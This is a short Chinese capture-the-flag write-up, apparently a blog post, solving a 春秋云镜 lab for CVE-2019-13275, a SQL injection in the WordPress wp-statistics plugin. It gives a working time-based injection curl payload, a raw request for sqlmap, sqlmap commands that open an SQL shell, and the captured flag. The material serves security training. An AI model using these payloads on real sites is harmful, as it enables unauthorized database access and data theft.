春秋云镜 CVE-2019-13275

春秋云镜 CVE-2019-13275 WordPress Plugin wp-statics SQLI

靶标介绍

WordPress VeronaLabs wp-statistics插件12.6.7之前版本中的v1/hit端点存在SQL注入漏洞。

启动场景

漏洞利用

exp

php 复制代码
time curl -X POST 'http://host/wp-json/wpstatistics/v1/hit' --data "wp_statistics_hit=x&wp_statistics_hit[track_all]=1&wp_statistics_hit[page_uri]=x&wp_statistics_hit[search_query]=x\' UNION ALL SELECT SLEEP(5)-- x"

POST注入请求包

bash 复制代码
POST /wp-json/wpstatistics/v1/hit HTTP/1.1
Host: eci-2zebfk328mr50v11k7a0.cloudeci1.ichunqiu.com
User-Agent: curl/7.84.0
Accept: */*
Content-Length: 146
Content-Type: application/x-www-form-urlencoded
Connection: close

wp_statistics_hit=x&wp_statistics_hit[track_all]=1&wp_statistics_hit[page_uri]=x&wp_statistics_hit[search_query]=x'*

保存为1.txt

python3 sqlmap.py -r 1.txt

python3 sqlmap.py -r 1.txt --sql-shell

select flag from flag;

得到flag

flag{a3c98c0e-1022-4214-9092-fb936cf83e6e}

相关推荐
数字扫地僧5 分钟前
WebLogic 版本升级的注意事项与流程
数据库
Viktor_Ye22 分钟前
高效集成易快报与金蝶应付单的方案
java·前端·数据库
Rverdoser26 分钟前
Linux环境开启MongoDB的安全认证
linux·安全·mongodb
努力算法的小明1 小时前
SQL 复杂查询
数据库·sql
速盾cdn1 小时前
速盾:CDN缓存的工作原理是什么?
网络·安全·web安全
斗-匕1 小时前
MySQL 三大日志详解
数据库·mysql·oracle
代码中の快捷键1 小时前
MySQL数据库存储引擎
数据库·mysql
只因在人海中多看了你一眼1 小时前
数据库体系
数据库
IPFoxy6661 小时前
跨境出海安全:如何防止PayPal账户被风控?
安全